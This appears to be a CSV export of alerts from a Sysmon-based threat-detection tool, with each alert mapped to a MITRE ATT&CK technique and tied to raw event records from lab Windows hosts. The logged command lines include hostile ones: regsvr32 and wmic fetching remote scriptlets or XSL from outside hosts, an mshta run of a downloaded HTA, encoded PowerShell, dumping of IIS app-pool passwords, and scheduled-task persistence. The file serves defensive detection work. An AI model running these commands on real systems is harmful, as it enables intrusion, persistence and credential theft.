SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1
365ABB72-AC60-5CB8-0000-001002B30800
3904
C:\Windows\System32\eventvwr.exe
"C:\Windows\system32\eventvwr.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
1
5
4
1
0
0x8000000000000000
7648
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-06-15 07:13:42.278
365ABB72-9AA6-5D04-0000-00109C850F00
652
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
"C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-98E4-5D04-0000-0020A4350100
0x135a4
1
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-9972-5D04-0000-0010F0490C00
3660
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.121924,2019-05-27T05:29:18.121924+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1,"
1
5
4
1
0
0x8000000000000000
5913
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.081
365ABB72-3D6E-5CEB-0000-00100C87FF00
2896
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558630145.862062,2019-05-23T20:49:05.862062+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" ),1,"
1
5
4
1
0
0x8000000000000000
892
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-23 16:49:05.686
365ABB72-CF01-5CE6-0000-00105DA50C00
3872
C:\Windows\System32\wbem\WMIC.exe
6.1.7600.16385 (win7_rtm.090713-1255)
WMI Commandline Utility
Microsoft® Windows® Operating System
Microsoft Corporation
wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl"
c:\
IEWIN7\IEUser
365ABB72-CE6C-5CE6-0000-002047F30000
0xf347
1
High
SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
365ABB72-CE84-5CE6-0000-001094130600
2940
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
16793
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 18:35:05.765
365ABB72-6759-5CD8-0000-001085031000
1912
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe"
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-63FC-5CD8-0000-0020EE3E0100
0x13eee
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-6759-5CD8-0000-0010E2D50F00
1420
C:\Windows\System32\regsvr32.exe
regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
16793
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 18:35:05.765
365ABB72-6759-5CD8-0000-001085031000
1912
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe"
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-63FC-5CD8-0000-0020EE3E0100
0x13eee
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-6759-5CD8-0000-0010E2D50F00
1420
C:\Windows\System32\regsvr32.exe
regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436008.250664,2019-07-30T01:33:28.250664+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
4915
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-29 21:33:24.152
747F3D96-6623-5D3F-0000-0010BC068800
3000
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49828
false
151.101.0.133
443
https
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( "C:\Windows\system32\whoami.exe" /user) ,1,"
1
5
4
1
0
0x8000000000000000
14
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1033,technique_name=System Owner/User Discovery
2019-04-18 16:56:24.833
365ABB72-AC38-5CB8-0000-0010365E0800
3576
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /user
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-AB27-5CB8-0000-002021CA0000
0xca21
1
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1,"
1
5
4
1
0
0x8000000000000000
14
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1033,technique_name=System Owner/User Discovery
2019-04-18 16:56:24.833
365ABB72-AC38-5CB8-0000-0010365E0800
3576
C:\Windows\System32\whoami.exe
6.1.7600.16385 (win7_rtm.090713-1255)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\whoami.exe" /user
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-AB27-5CB8-0000-002021CA0000
0xca21
1
High
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1,"
1
5
4
1
0
0x8000000000000000
6195
Microsoft-Windows-Sysmon/Operational
IEWIN7
Persistence - Scheduled Task Management
2019-05-27 15:12:59.558
365ABB72-FE7B-5CEB-0000-0010D6820C00
4044
C:\Windows\System32\schtasks.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Manages scheduled tasks
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
365ABB72-FE7B-5CEB-0000-0010867F0C00
4012
C:\Windows\System32\cmd.exe
cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.041809,2019-05-27T05:29:18.041809+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password ),1,"
1
5
4
1
0
0x8000000000000000
5910
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.011
365ABB72-3D6E-5CEB-0000-00104C83FF00
2472
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
16116
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-11 17:58:50.075
365ABB72-0D5A-5CD7-0000-001069031700
2544
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
c:\Windows\System32\cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-8693-5CD7-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-0D3F-5CD7-0000-00107F541600
3212
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
16116
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-11 17:58:50.075
365ABB72-0D5A-5CD7-0000-001069031700
2544
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
c:\Windows\System32\cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-8693-5CD7-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-0D3F-5CD7-0000-00107F541600
3212
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
16116
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-11 17:58:50.075
365ABB72-0D5A-5CD7-0000-001069031700
2544
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
c:\Windows\System32\cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-8693-5CD7-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-0D3F-5CD7-0000-00107F541600
3212
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll)",1,"
1
5
4
1
0
0x8000000000000000
16792
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 18:35:05.140
365ABB72-6759-5CD8-0000-0010E2D50F00
1420
C:\Windows\System32\regsvr32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-63FC-5CD8-0000-0020EE3E0100
0x13eee
1
Medium
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
365ABB72-6693-5CD8-0000-0010AE4C0E00
3528
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
18918
Microsoft-Windows-Sysmon/Operational
DC1.insecurebank.local
technique_id=T1033,technique_name=System Owner/User Discovery
2019-05-16 16:08:40.350
DFAE8213-8B08-5CDD-0000-001011CE0A00
3764
C:\Windows\System32\whoami.exe
6.3.9600.16384 (winblue_rtm.130821-1623)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami
C:\Windows\system32\
NT AUTHORITY\SYSTEM
DFAE8213-832F-5CDD-0000-0020E7030000
0x3e7
2
System
SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47
DFAE8213-8B02-5CDD-0000-00109BCA0A00
1720
C:\Windows\System32\osk.exe
"C:\Windows\System32\osk.exe"
",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
16792
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 18:35:05.140
365ABB72-6759-5CD8-0000-0010E2D50F00
1420
C:\Windows\System32\regsvr32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-63FC-5CD8-0000-0020EE3E0100
0x13eee
1
Medium
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
365ABB72-6693-5CD8-0000-0010AE4C0E00
3528
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
16792
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 18:35:05.140
365ABB72-6759-5CD8-0000-0010E2D50F00
1420
C:\Windows\System32\regsvr32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-63FC-5CD8-0000-0020EE3E0100
0x13eee
1
Medium
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
365ABB72-6693-5CD8-0000-0010AE4C0E00
3528
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243538
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.021
747F3D96-9F69-5E75-0000-00106F6A2000
2536
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589329703.257302,2020-05-13T04:28:23.257302+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
148597
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-13 00:28:16.115
747F3D96-3F20-5EBB-0000-0010035E3600
8052
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-3821-5EBB-0000-0020E7030000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-3821-5EBB-0000-001040690000
732
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243538
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.021
747F3D96-9F69-5E75-0000-00106F6A2000
2536
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c pause ),1,"
1
5
4
1
0
0x8000000000000000
376
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 00:35:07.386
365ABB72-47BB-5CE3-0000-00108CAD3E00
3176
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.exe /c pause
C:\Users\IEUser\Downloads\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-47BB-5CE3-0000-0010BFA83E00
1912
C:\Users\IEUser\Downloads\com-hijack.exe
"C:\Users\IEUser\Downloads\com-hijack.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243538
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.021
747F3D96-9F69-5E75-0000-00106F6A2000
2536
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969979.57807,2019-05-27T19:12:59.578070+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1,"
1
5
4
1
0
0x8000000000000000
6193
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:59.510
365ABB72-FE7B-5CEB-0000-0010867F0C00
